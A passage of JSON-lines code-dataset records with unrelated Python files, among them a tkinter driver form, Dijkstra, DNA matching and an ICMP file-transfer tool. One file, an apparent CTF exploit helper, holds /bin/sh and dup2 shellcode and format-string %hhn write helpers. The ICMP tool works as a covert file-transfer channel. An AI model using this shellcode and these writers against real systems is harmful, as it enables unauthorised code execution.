font=(\"Arial\", 12), width=15)\r\n deposit_entry.grid(row=0, column=3, pady=2, padx=5)\r\n base.grid(row=1, column=0, pady=2, padx=5)\r\n base_vr = IntVar()\r\n base_spin = ttk.Spinbox(payment_mode, from_=0, to=100, textvariable=base_vr, font=(\"Arial\", 12), width=13)\r\n base_spin.set(0)\r\n base_spin.grid(row=1, column=1, pady=2, padx=5)\r\n radio.grid(row=1, column=2, pady=2, padx=5)\r\n radio_vr = IntVar()\r\n radio_spin = ttk.Spinbox(payment_mode, from_=0, to=100, textvariable=radio_vr, font=(\"Arial\", 12), width=13)\r\n radio_spin.set(0)\r\n radio_spin.grid(row=1, column=3, pady=2, padx=5)\r\n outstanding_b.grid(row=2, column=0, pady=2, padx=5)\r\n outstanding_b_entry = Entry(payment_mode, font=(\"Arial\", 12), width=15)\r\n outstanding_b_entry.grid(row=2, column=1, pady=2, padx=5)\r\n commission_rate.grid(row=2, column=2, pady=2, padx=5)\r\n commission_rate_vr = IntVar()\r\n commission_rate_spin = ttk.Spinbox(payment_mode, from_=0, to=100, textvariable=commission_rate_vr,\r\n font=(\"Arial\", 12), width=13)\r\n commission_rate_spin.set(0)\r\n commission_rate_spin.grid(row=2, column=3, pady=2, padx=5)\r\n commission_rate_acc.grid(row=3, column=0, pady=2, padx=5)\r\n commission_rate_acc_vr = IntVar()\r\n commission_rate_acc_spin = ttk.Spinbox(payment_mode, from_=0, to=100, textvariable=commission_rate_acc_vr,\r\n font=(\"Arial\", 12), width=13)\r\n commission_rate_acc_spin.set(0)\r\n commission_rate_acc_spin.grid(row=3, column=1, pady=2, padx=5)\r\n rent.grid(row=3, column=2, pady=2, padx=5)\r\n rent_entry = Entry(payment_mode, font=(\"Arial\", 12), width=15)\r\n rent_entry.grid(row=3, column=3, pady=2, padx=5)\r\n salary.grid(row=4, column=0, pady=2, padx=5)\r\n salary_entry = Entry(payment_mode, font=(\"Arial\", 12), width=15)\r\n salary_entry.grid(row=4, column=1, pady=2, padx=5)\r\n # __________________ Button for drivers_____________\r\n add_driver_button = Frame(add_new_driver_frame, bg=\"purple\")\r\n add_driver_button.place(x=frame_width * 0.055, y=frame_height * 0.55, height=frame_height * 0.22,\r\n width=frame_width * 0.8)\r\n pda_settings = Button(add_driver_button, text=\"PDA settings\")\r\n manage_vehicle = Button(add_driver_button, text=\"Manage Vehicle\")\r\n manage_leave = Button(add_driver_button, text=\"Manage Leave\")\r\n add_edit_vehicle = Button(add_driver_button, text=\"Add/Edit Vehicle\")\r\n note_by_me = Label(add_driver_button, text=\"Note: Do not Put any Symbols in any field above\",\r\n font=(\"Comic Sans MS\", 12, \"bold\"))\r\n pda_settings.place(x=20, y=15, width=100, height=30)\r\n manage_vehicle.place(x=140, y=15, width=100, height=30)\r\n manage_leave.place(x=260, y=15, width=100, height=30)\r\n add_edit_vehicle.place(x=380, y=15, width=100, height=30)\r\n note_by_me.place(x=500, y=15)\r\n # ______________________\r\n save_driver_btn = Button(add_driver_button, text=\"Save\", command=saver)\r\n search_driver_btn = Button(add_driver_button, text=\"Search\")\r\n clear_driver_btn = Button(add_driver_button, text=\"Clear\")\r\n driver_list_btn = Button(add_driver_button, text=\"Driver List\")\r\n vehicle_history_btn = Button(add_driver_button, text=\"Vehicl History\")\r\n print_driver_btn = Button(add_driver_button, text=\"Print\")\r\n delete_driver_btn = Button(add_driver_button, text=\"Delete Driver\")\r\n close_driver_btn = Button(add_driver_button, text=\"Close\")\r\n save_driver_btn.place(x=20, y=60, width=100)\r\n search_driver_btn.place(x=140, y=60, width=100)\r\n clear_driver_btn.place(x=260, y=60, width=100)\r\n driver_list_btn.place(x=380, y=60, width=100)\r\n vehicle_history_btn.place(x=500, y=60, width=100)\r\n print_driver_btn.place(x=620, y=60, width=100)\r\n delete_driver_btn.place(x=740, y=60, width=100)\r\n close_driver_btn.place(x=860, y=60, width=100)\r\n # _____________________Driver_________________\r\n # driver_image_frame = Frame(add_new_driver_frame, bg=\"white\")\r\n # driver_image_frame.place(x=650, y=5, height=350, width=400)\r\n # add_image_driver = Button(driver_image_frame, text=\"Add Image of driver\", width=10, height=5)\r\n # add_image_driver.pack(pady=100)\r\n\r\n # ___________________________Vehicle Image --------------------------------\r\n vehicle_image_frame = Frame(add_new_driver_frame, bg=\"white\")\r\n # vehicle_image_frame.place(x=650, y=370, height=280, width=400)\r\n add_vehicle_image_driver = Button(vehicle_image_frame, text=\"Add Image of driver\", width=10, height=5)\r\n# add_vehicle_image_driver.pack(pady=100)\r\n","repo_name":"Junaid5814/cabhook","sub_path":"Driver/add_new_driver.py","file_name":"add_new_driver.py","file_ext":"py","file_size_in_byte":22619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11381399615","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport __main__, os, sys, struct, socket, telnetlib, subprocess, time\nfrom libformatstr import FormatStr\nimport sys, re, binascii\n\nhome = os.environ['HOME']\nmgtoolslib = home + \"/mgtools/lib/python\"\npedalib = home + \"/peda/lib\"\nif not(os.path.exists(pedalib)):\n print(\"[+]Error\\nTry: mpinstall\")\nsys.path.append(mgtoolslib)\nsys.path.append(pedalib)\n\nimport shlex\nimport string\nimport signal\nimport traceback\nimport codecs\nimport six\nfrom six.moves import range\nfrom six.moves import input\nimport six.moves.cPickle as pickle\nimport pickle\nfrom skeleton import *\nfrom shellcode import *\nfrom utils import *\nimport config\nfrom nasm import *\n\nproc = ''\ns = ''\n \ndef local(cmd):\n __main__.proc = subprocess.Popen(cmd.strip().split(' '))\n proc.wait()\n\ndef pipelocal(cmd):\n __main__.proc = subprocess.Popen(cmd.strip().split(' '), stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n\n# socat tcp-listen:4444,reuseaddr,fork exec:./a.out\ndef sock(remoteip=\"127.0.0.1\", remoteport=4444):\n __main__.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((remoteip, remoteport))\n time.sleep(0.5)\n\ndef splitn(data, n):\n length = len(data)\n return [data[i:i+n] for i in range(0, length, n)]\n\ndef writefile(buf_arg,file_name):\n with open(file_name, 'wb') as f:\n f.write(buf_arg)\n\ndef recv(delim='\\n', out=1):\n data = ''\n while not data.endswith(delim):\n data += s.recv(1)\n if(out == 1):\n print('\\nrecv: \\n' + data + '\\n')\n return data\n\ndef recvn(x=1024, out=1):\n data = ''\n data += s.recv(x)\n if(out == 1):\n print('\\nrecv: \\n' + data + '\\n')\n return data\n\ndef send(x, sleep=0.3, out=1):\n s.sendall(x + '\\n')\n if(out == 1):\n print('\\nsend: \\n' + x + '\\n')\n time.sleep(sleep)\n\ndef u(x):\n return struct.unpack(\"0):\n data += proc.stdout.read(1)\n num = num-1\n if(out == 1):\n print('\\nread: \\n' + data + '\\n')\n return data\n \ndef fsa1(recent_len, index_start, after_data):\n data = '%' + \\\n str( ((after_data-int(hex(recent_len)[:4],16)-1)%0x100)+1 ) + \\\n 'c%' + str(index_start) + '$hhn'\n return data\n\ndef fsa4(recent_len, index_start, after_addr):\n a = map(ord,p(after_addr))\n b = map(ord,p(after_addr))\n a[3] = ((a[3]-a[2]-1) % 0x100) + 1\n a[2] = ((a[2]-a[1]-1) % 0x100) + 1\n a[1] = ((a[1]-a[0]-1) % 0x100) + 1\n a[0] = ((a[0]-int(hex(recent_len)[:4],16)-1) % 0x100) + 1\n data = ''\n data += '%{0}c'.format(str(a[0])) + \\\n '%' + str(index_start+0) + '$hhn'\n data += '%{0}c'.format(str(a[1])) + \\\n '%' + str(index_start+1) + '$hhn'\n data += '%{0}c'.format(str(a[2])) + \\\n '%' + str(index_start+2) + '$hhn'\n data += '%{0}c'.format(str(a[3])) + \\\n '%' + str(index_start+3) + '$hhn'\n return data\n\ndef writefile(buf_arg,file_name):\n with open(file_name, 'wb') as f:\n f.write(buf_arg)\n\ndef addr2index(x):\n return x*2\n\ndef index2addr(x):\n return x/2\n\ndef ascii2addr(x):\n addr1 = str(x)[0:2]\n addr2 = str(x)[2:4]\n addr3 = str(x)[4:6]\n addr4 = str(x)[6:8]\n return int(addr4 + addr3 + addr2 + addr1, 16)\n\ndef splitn(data, n):\n length = len(data)\n return [data[i:i+n] for i in range(0, length, n)]\n\ndef xxd(a):\n a = str(a)\n hexdump.hexdump(a)\n\ndef dmp(binary, fmt=\"def\"):\n res = binascii.hexlify(binary)\n if(fmt == \"x\"):\n arr = splitn(res, 8)\n res = []\n for var in arr:\n res.append(hex(ascii2addr(var)))\n if(fmt == \"d\"):\n arr = splitn(res, 8)\n res = []\n for var in arr:\n res.append(ascii2addr(var))\n return res\n\ndef s12(value):\n res = []\n for item in value.split(\" \"):\n res.append(bin(int(item,16))[2:])\n return -(int(res[0].zfill(4)+res[1].zfill(8),2) & 0b100000000000) | (int(res[0].zfill(4)+res[1].zfill(8),2)& 0b011111111111)\n\nsc_execve32 = \"\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"\nsc_execve64 = \"\\x48\\x31\\xd2\\x48\\xbb\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xeb\\x08\\x53\\x48\\x89\\xe7\\x50\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\"\nsc_dup2execve32 = \"\\x31\\xd2\\x31\\xc9\\x8d\\x5a\\x04\\x8d\\x42\\x3f\\xcd\\x80\\x41\\x8d\\x42\\x3f\\xcd\\x80\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"\n\"\"\"\n /* sc_dup2execve32 */\n .intel_syntax noprefix\n .globl _start\n_start:\n /* dup2(2, 0) */\n xor edx, edx\n xor ecx, ecx\n lea ebx, [edx+4] //fd 4\n lea eax, [edx+63]\n int 0x80\n /* dup2(2, 1) */\n inc ecx\n lea eax, [edx+63]\n int 0x80\n /* execve(\"/bin//sh\", {\"/bin//sh\", NULL}, NULL) */\n xor edx, edx\n push edx\n push 0x68732f2f\n push 0x6e69622f\n mov ebx, esp\n push edx\n push ebx\n mov ecx, esp\n lea eax, [edx+11]\n int 0x80\n\"\"\"\n#-----------START EXPLOIT CODE-----------#\n\n","repo_name":"miyagaw61/mgtools","sub_path":"ctf/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"60"} +{"seq_id":"43326836179","text":"from queue import PriorityQueue\n\n\nclass Graph:\n\n def __init__(self, vertices, source):\n self.V = vertices\n self.graph = []\n self.distance = [float(\"Inf\")] * self.V\n self.distance[source] = 0\n self.visited = []\n self.q = PriorityQueue()\n self.q.put((0, source))\n\n def add_edge(self, u, v, w):\n self.graph.append([u, v, w])\n\n def relax(self):\n for i in range(self.V):\n for u, v, w in self.graph:\n if self.distance[u] != float(\"Inf\") and self.distance[u] + w < self.distance[v]:\n self.distance[v] = self.distance[u] + w\n self.q.put(self.distance[u] + w, i)\n\n def dijkstra(self):\n while not self.q.empty():\n current = self.q.get()\n self.visited.append(current)\n for i in range(self.V):\n if i not in self.visited:\n self.relax()\n for k in range(self.V):\n print(\"{0} ----> {1}\".format(k, self.distance[k]))\n\n\n# clrs example\n# s=0 , t=1 ,y=2 , x=3, z=4\ng = Graph(5, 0)\ng.add_edge(0, 1, 10)\ng.add_edge(0, 2, 5)\ng.add_edge(1, 2, 2)\ng.add_edge(1, 3, 1)\ng.add_edge(2, 1, 3)\ng.add_edge(2, 3, 9)\ng.add_edge(2, 4, 2)\ng.add_edge(3, 4, 4)\ng.add_edge(4, 3, 6)\ng.add_edge(4, 0, 7)\ng.dijkstra()\n","repo_name":"MahyarFardin/CLRS-Algoriothms","sub_path":"36- Single-Source Shortest Paths/Dijkstra’s algorithm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"7812789125","text":"#!/usr/bin/sudo python3\nimport argparse\nimport logging\nimport os\nimport pathlib\nimport sys\nfrom enum import Enum\n\nfrom magicPing import client\nfrom magicPing import server\nfrom magicPing import icmp\n\n\nclass TypeOfApp(Enum):\n \"\"\"\n Типы работы приложения\n \"\"\"\n MONITOR = 0\n SERVER = 1\n CLIENT = 2\n\n\ndef get_parser() -> argparse.ArgumentParser:\n \"\"\"\n генерация парсера аргументов командной строки\n :return: сгенерированный парсер\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Приложение для посылки/приёма сообщений с помощью ECHO REQUEST\")\n parser.set_defaults(type=None)\n parser.add_argument(\"--log_file\", \"-l\", dest=\"log_file\", type=open,\n default=sys.stderr, help=\"Путь до файла для логов\")\n\n log_level = parser.add_mutually_exclusive_group()\n log_level.set_defaults(log_level=logging.INFO)\n log_level.add_argument(\"--error\", \"-e\", dest=\"log_level\",\n action=\"store_const\", const=logging.ERROR,\n help=\"Ограничить логирование ошибками\")\n log_level.add_argument(\"--info\", \"-i\", dest=\"log_level\",\n action=\"store_const\", const=logging.INFO,\n help=\"Ограничить логирование информацией\")\n log_level.add_argument(\"--debug\", \"-d\", dest=\"log_level\",\n action=\"store_const\", const=logging.DEBUG,\n help=\"Ограничить логирование сообщениями для дебага\")\n subparsers = parser.add_subparsers()\n\n server_parser = subparsers.add_parser(\"server\", aliases=[\"s\"], help=\"запуск сервера\")\n server_parser.set_defaults(type=TypeOfApp.SERVER)\n server_parser.add_argument(\"--max_size\", \"-m\", type=int, default=1024 ** 3 * 15,\n help=\"Максимальный размер файла в байтах\", )\n server_parser.add_argument(\"--thread_number\", \"-t\", type=int, default=1,\n help=\"Кол-во потоков, обрабатывающих пакеты\")\n daemon_group = server_parser.add_mutually_exclusive_group()\n daemon_group.add_argument(\"--start_daemon\", \"-d\", action=\"store_const\",\n const=True, default=False, help=\"Запустить в качестве демона\")\n daemon_group.add_argument(\"--stop_daemon\", \"-s\", action=\"store_const\",\n const=True, default=False, help=\"Завершить демона\")\n daemon_group.add_argument(\"--restart_daemon\", \"-r\", action=\"store_const\",\n const=True, default=False, help=\"Перезапустить демона\")\n server_parser.add_argument(\"--target_path\", \"-p\",\n type=lambda x: pathlib.Path(os.path.realpath(x)),\n default=pathlib.Path(os.getcwd()),\n help=\"Директория для входящих файлов\")\n\n client_parser = subparsers.add_parser(\"client\", aliases=[\"c\"], help=\"запуск клиента\")\n client_parser.set_defaults(type=TypeOfApp.CLIENT)\n client_parser.add_argument(\"--max_size\", \"-m\", type=int, default=1024 ** 3 * 15,\n help=\"Максимальный размер файла в байтах\")\n timeout_group = client_parser.add_mutually_exclusive_group()\n timeout_group.add_argument(\"--timeout\", \"-t\", type=float, default=10.,\n help=\"Максимальное время ожидания в секундах\")\n timeout_group.add_argument(\"--unlimited\", \"-u\", action=\"store_const\",\n const=None, dest=\"timeout\", help=\"Не ограничивать время ожидания\")\n client_parser.add_argument(\"--filename\", \"-f\", default=None, help=\"Путь до файла для отправки\")\n client_parser.add_argument(\"--destination\", \"-d\", default=None, help=\"адрес получателя\")\n client_parser.add_argument(\"--cypher\", \"-c\", action=\"store_const\",\n const=True, default=False, help=\"Использовать шифрование\")\n\n monitor_parser = subparsers.add_parser(\"monitor\", aliases=[\"m\"],\n help=\"запуск мониторинга \" +\n \"ping echo request/reply\")\n monitor_parser.set_defaults(type=TypeOfApp.MONITOR)\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n logging.basicConfig(format=\"%(levelname)-8s [%(asctime)-15s; %(name)s]: %(message)s\",\n level=args.log_level, stream=args.log_file)\n\n if args.type == TypeOfApp.SERVER:\n if args.start_daemon:\n server.DaemonServer(args.max_size, args.thread_number, args.target_path).start()\n elif args.stop_daemon:\n server.DaemonServer(None, None, None).stop()\n elif args.restart_daemon:\n server.DaemonServer(None, None, None).restart()\n else:\n daemon_server = server.DaemonServer(args.max_size, args.thread_number, args.target_path,\n stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr)\n daemon_server.start()\n while input(\"введите \\\"q\\\", чтобы завершить работу сервера\\n\") != \"q\":\n pass\n else:\n daemon_server.stop()\n sys.exit(0)\n\n elif args.type == TypeOfApp.CLIENT:\n client = client.Client(max_size=args.max_size, timeout=args.timeout, enable_cypher=args.cypher)\n client.send(args.filename if args.filename is not None else input(\"Имя файла для отправки: \"),\n args.destination if args.destination is not None else input(\"Адресат: \"))\n\n elif args.type == TypeOfApp.MONITOR:\n icmp.monitor()\n\n else:\n parser.print_help()\n","repo_name":"2ZeroSix/magic-ping","sub_path":"magicPing/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15618165682","text":"import pandas as pd\n\nfrom latex import utils as latex_utils\nfrom latex.table_creator import table_creator\nfrom validator_tests.utils.constants import TARGET_ACCURACY\n\n\ndef preprocess_df(df):\n latex_utils.convert_adapter_name(df)\n return df\n\n\ndef reshape_into_best_accuracy_table(df):\n df = df.pivot(index=\"adapter\", columns=\"task\").droplevel(level=0, axis=1)\n df = latex_utils.add_source_only(df, TARGET_ACCURACY)\n df = latex_utils.shortened_task_names(df)\n df = (df * 100).round(1)\n return df\n\n\ndef postprocess_df(df):\n df = pd.concat(df, axis=0)\n df = df.drop(columns=[f\"{TARGET_ACCURACY}_std\"])\n return reshape_into_best_accuracy_table(df)\n\n\ndef min_value_fn(x, *_):\n return x.loc[\"Source only\"]\n\n\ndef best_accuracy_per_adapter(args, do_save_to_latex=True):\n nlargest = args.nlargest\n basename = f\"best_accuracy_per_adapter_{nlargest}\"\n color_map_tag_kwargs = {\n \"tag_prefix\": latex_utils.get_tag_prefix(basename),\n \"min_value_fn\": min_value_fn,\n }\n caption = (\n f\"The average of the top {nlargest} target domain accuracies per adapter/task pair. \"\n \"Green cells have an average accuracy greater than than the source-only model. \"\n \"A stronger green color indicates higher accuracy. The highest value per column is bolded.\"\n )\n return table_creator(\n args,\n args.input_folder,\n args.output_folder,\n basename,\n preprocess_df,\n postprocess_df,\n color_map_tag_kwargs,\n add_resizebox=True,\n caption=caption,\n final_str_hook=latex_utils.adapter_final_str_hook,\n do_save_to_latex=do_save_to_latex,\n )\n","repo_name":"KevinMusgrave/powerful-benchmarker","sub_path":"latex/best_accuracy_per_adapter.py","file_name":"best_accuracy_per_adapter.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":423,"dataset":"github-code","pt":"60"} +{"seq_id":"9373174825","text":"from unittest import result\nfrom data import *\nfrom data import GreatesHits80s\nfrom functions import *\n'''\nhány szám található a listában?\nlegrégebbi szám címe és előadója\nleghosszabb szám hossza, megjelenés éve és kategóriája\nKérjünk egy kategóriát, hány szám van a listában ebből a kategóriából?\n ha nincs, akkor írjuk ki, hogy nincs\nKérjünk be egy előadó nevet, szerepel-e a listában a dala \n ne folytassa a keresést talált előadót\n'''\nprint('1 feladat')\nprint(f'\\t A listában {len(GreatesHits80s)} dal szerepel')\n\n \nmaxIndex = 0\nmaxValue = idotartam(GreatesHits80s[0])\n\nfor i in range(1,len(GreatesHits80s)):\n if maxValue < idotartam(GreatesHits80s[i]):\n maxValue = idotartam(GreatesHits80s[i])\n maxIndex = i\n\n\n\nprint(f'2. feladat: A leghosszabb szám: {maxValue} másodperc')\nprint(f'Megjelenés éve: {(GreatesHits80s[maxIndex])}')\nprint(f'Kategóriája: {categorie(GreatesHits80s[maxIndex])}')\nprint('3. feladat')\nkategoria = input('\\t kérek a kategória nevét: ')\n\ncount = 0\n\nfor h in GreatesHits80s:\n if categorie(h).upper() == kategoria.upper():\n count != 1\nif count == 0:\n print('\\t Ebben a kategóriában nincs dal a listában.')\nelse:\n print(f'\\t {count} dal szerepel a listában ebből a kategóriából.')\n\n\nprint('4. faldat')\n\n\nname = input('\\t Előadó neve: ')\n\nfor i in GreatesHits80s:\n for szam in GreatesHits80s:\n szamok = szam.split(';')\n if szamok[1] == name:\n print('\\tEladőadó szerepel a listában')\n break\n else: \n print('\\tEladőadó nem szerepel a listában')\n \n ","repo_name":"kevin16740/vizsgasegedletek","sub_path":"Gyak/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10988538567","text":"def inputData(lst35):\n for i in range(3):\n print('#%d student' % (i + 1))\n lst35.append([])\n for j in range(5):\n lst35[i].insert(j, eval(input()))\n return lst35\n\n\ndef totAver(lst35):\n for i in range(len(lst35)):\n print('#%d student:' % (i + 1))\n print('sum = %d, average = %.2f' % (sum(lst35[i]), sum(lst35[i]) / len(lst35[i])))\n print()\n\n\ndef main():\n lst35 = []\n lst35 = inputData(lst35)\n totAver(lst35)\n\n\nmain()\n","repo_name":"tueswking511/TQC_Python","sub_path":"Ch06/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74762781632","text":"import numpy as np\n\n\ndef image2tile(im, size: int) -> list:\n w = h = size\n tiles = [im[i:(i + h), j:(j + w), ...] for i in range(0, im.shape[0], h) for j in range(0, im.shape[1], w)]\n idxs = [(i, (i + h), j, (j + w)) for i in range(0, im.shape[0], h) for j in range(0, im.shape[1], w)]\n for idx, tile in enumerate(tiles):\n if tile.shape[:2] != (h, w):\n tile_ = tile\n tile = np.zeros_like(tiles[0])\n tile[:tile_.shape[0], :tile_.shape[1], ...] = tile_\n tiles[idx] = tile\n return tiles, idxs\n\n\ndef tile2image(tiles, idxs, size: list):\n seg = np.zeros([*size, tiles[0].shape[2]], dtype=tiles[0].dtype)\n for tile, (i1, i2, j1, j2) in zip(tiles, idxs):\n i2 = min(i2, size[0])\n j2 = min(j2, size[1])\n seg[i1:i2, j1:j2, :] = tile[:(i2 - i1), :(j2 - j1), :]\n return seg","repo_name":"DanilKim/hbmap","sub_path":"utils/tile_utils.py","file_name":"tile_utils.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"74471048832","text":"import numpy as np\nimport time\n#from nms.nums_py2 import py_cpu_nms # for cpu\nfrom nms.gpu_nms import gpu_nms # for gpu \n\n\nnp.random.seed( 1 ) # keep fixed\nnum_rois = 6000\nminxy = np.random.randint(50,145,size=(num_rois ,2))\nmaxxy = np.random.randint(150,200,size=(num_rois ,2))\nscore = 0.8*np.random.random_sample((num_rois ,1))+0.2\n\nboxes_new = np.concatenate((minxy,maxxy,score), axis=1).astype(np.float32)\n\ndef nms_test_time(boxes_new):\n\n thresh = [0.7,0.8,0.9]\n T = 50\n for i in range(len(thresh)):\n since = time.time()\n for t in range(T):\n\n# keep = py_cpu_nms(boxes_new, thresh=thresh[i]) # for cpu\n keep = gpu_nms(boxes_new, thresh=thresh[i]) # for gpu\n print(\"thresh={:.1f}, time wastes:{:.4f}\".format(thresh[i], (time.time()-since)/T))\n \n return keep\n\n\nif __name__ ==\"__main__\":\n nms_test_time(boxes_new)\n \n\n\n","repo_name":"dataloop-ai/AutoML","sub_path":"networks/retinanet/lib/nms/test_num.py","file_name":"test_num.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":337,"dataset":"github-code","pt":"60"} +{"seq_id":"4681042636","text":"import csv\n\n\ndef find_mpg(request):\n reader = csv.reader(open('transscraper/static/data/mpg.csv'),delimiter=',')\n car_data_found = False\n for row in reader:\n if (row[1].count(request.car_make) != 0):\n if (row[3].count(request.car_model) != 0):\n car_data = row\n car_data_found = True\n break\n \n if ( car_data_found == True ) :\n return car_data[11]\n else :\n return 21","repo_name":"soncodi/hackathon","sub_path":"backend/transscraper/mpg_api.py","file_name":"mpg_api.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75427526270","text":"\r\nclass Grid:\r\n \r\n def __init__(self, matrix, rows, cols, spacing=49):\r\n self.spacing = min(width/cols, height/rows)\r\n self.cols = cols\r\n self.rows = rows\r\n self.matrix = matrix\r\n \r\n \r\n \r\n def display(self):\r\n \r\n # Preenche um grid na tela tendo como referencia a matriz que representa o ambiente\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n x = j * self.spacing\r\n y = i * self.spacing \r\n \r\n # Preenche o a celula no grid com a cor do seu tipo\r\n fill(self.matrix[i][j].color)\r\n stroke(0)\r\n rect(x, y, self.spacing, self.spacing)\r\n","repo_name":"AlexandreKavalerski/agente-de-busca","sub_path":"utils/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40479732105","text":"import csv\nimport sys\n\n\ndef main():\n\n # TODO: Check for command-line usage\n if len(sys.argv) != 3:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n\n # TODO: Read database file into a variable\n persons = []\n # read in the first CSV file\n with open(sys.argv[1], \"r\") as database:\n reader = csv.DictReader(database)\n # get the header of the file\n DB_header = reader.fieldnames\n # file the persons list with the people\n for row in reader:\n persons.append(row)\n\n # Read DNA sequence file into a variable\n with open(sys.argv[2], \"r\") as DNA:\n DNA_data = DNA.read()\n\n # Find longest match of each STR in DNA sequence\n\n # intialize STR Name variable\n STR_name = []\n # look at each value in the DB_header\n for STR in (DB_header):\n # only want the STR sequences and append them to the\n if STR != \"name\":\n STR_name.append(STR)\n\n # make an empty dictionary with all the STR sequences and set thier value to 0\n STRS = dict.fromkeys(STR_name, 0)\n for x in STR_name:\n # set the STR sequences to the longest match\n STRS[x] = longest_match(DNA_data, x)\n\n # TODO: Check database for matching profiles\n\n # look at each person in the persons list\n for person in persons:\n # intialize sequence variable to see if person matches all STR sequences\n sequences = 0\n for str in STRS:\n # See if the str of the person matches the longest STR recoreded and add plus one to the sequences\n if int(person[str]) != STRS[str]:\n continue\n sequences += 1\n\n # if the sequences variables is the same lenght as the STR dicitonary, found match and print their name\n if (sequences == len(STRS)):\n print(person['name'])\n return\n\n # else return no match\n print(\"No Match\")\n return\n\n\ndef longest_match(sequence, subsequence):\n \"\"\"Returns length of longest run of subsequence in sequence.\"\"\"\n\n # Initialize variables\n longest_run = 0\n subsequence_length = len(subsequence)\n sequence_length = len(sequence)\n\n # Check each character in sequence for most consecutive runs of subsequence\n for i in range(sequence_length):\n\n # Initialize count of consecutive runs\n count = 0\n\n # Check for a subsequence match in a \"substring\" (a subset of characters) within sequence\n # If a match, move substring to next potential match in sequence\n # Continue moving substring and checking for matches until out of consecutive matches\n while True:\n\n # Adjust substring start and end\n start = i + count * subsequence_length\n end = start + subsequence_length\n\n # If there is a match in the substring\n if sequence[start:end] == subsequence:\n count += 1\n\n # If there is no match in the substring\n else:\n break\n\n # Update most consecutive matches found\n longest_run = max(longest_run, count)\n\n # After checking for runs at each character in seqeuence, return longest run found\n return longest_run\n\n\nmain()\n","repo_name":"JosephNeas/CS50x","sub_path":"Problem Set 6/dna/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6816391610","text":"from timeit import default_timer as timer\n\nlines = str()\nwith open('21_input.txt') as f:\n\tlines = [n.strip() for n in f.readlines()]\n\ndef part1(lines):\n\trecipes = []\n\tfor line in lines:\n\t\ts = line.split(' (contains')\n\t\ta = s[0].strip().split(' ')\n\t\tb = s[1].strip().split(', ')[:-1]\n\t\tnewRecipe = (a, b)\n\t\trecipes.append(newRecipe)\n\n\t\n\ndef part2(lines):\n\tpass\n\n\n\n\nstart = timer()\np1 = part1(lines)\nend = timer()\nprint(\"Part 1:\", p1)\nprint(\"Time (msec):\", (end - start) * 1000)\nprint()\n\nstart = timer()\np2 = part2(lines)\nend = timer()\nprint(\"Part 2:\", p2)\nprint(\"Time (msec):\", (end - start) * 1000)\nprint()","repo_name":"carsongmiller/AoC2020","sub_path":"Python/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11002860060","text":"from .input_reader import InputReader\n\nclass Floris():\n \"\"\"\n Floris is the highest level class of the Floris package. Import this class\n and instantiate it with a path to an input file to begin running Floris. Use\n the ``farm`` attribute to access other objects within the model.\n\n inputs:\n input_file: str - path to the json input file\n input_dict: dict - dictionary of appropriate inputs\n\n outputs:\n self: Floris - an instantiated Floris object\n \"\"\"\n\n def __init__(self, input_file=None, input_dict=None):\n self.input_reader = InputReader()\n self.input_file = input_file\n self.input_dict = input_dict\n self.farm = self.input_reader.read(input_file=self.input_file,\n input_dict=self.input_dict)\n","repo_name":"timo-verstraeten/mats-experiments","sub_path":"cpp/sim/floris/floris.py","file_name":"floris.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"21335212089","text":"num = int(input('Digite um numero inteiro: '))\r\nprint('''Escolha uma das bases para conversão:\r\n [ 1 ] converter para BINÁRIO\r\n [ 2 ] converter para OCTAL\r\n [ 3 ] converter para HEXADECIMAL''') #ao utilizar as 3 aspas posso dar a quebra de linha com enter e o programa entende\r\ncond = 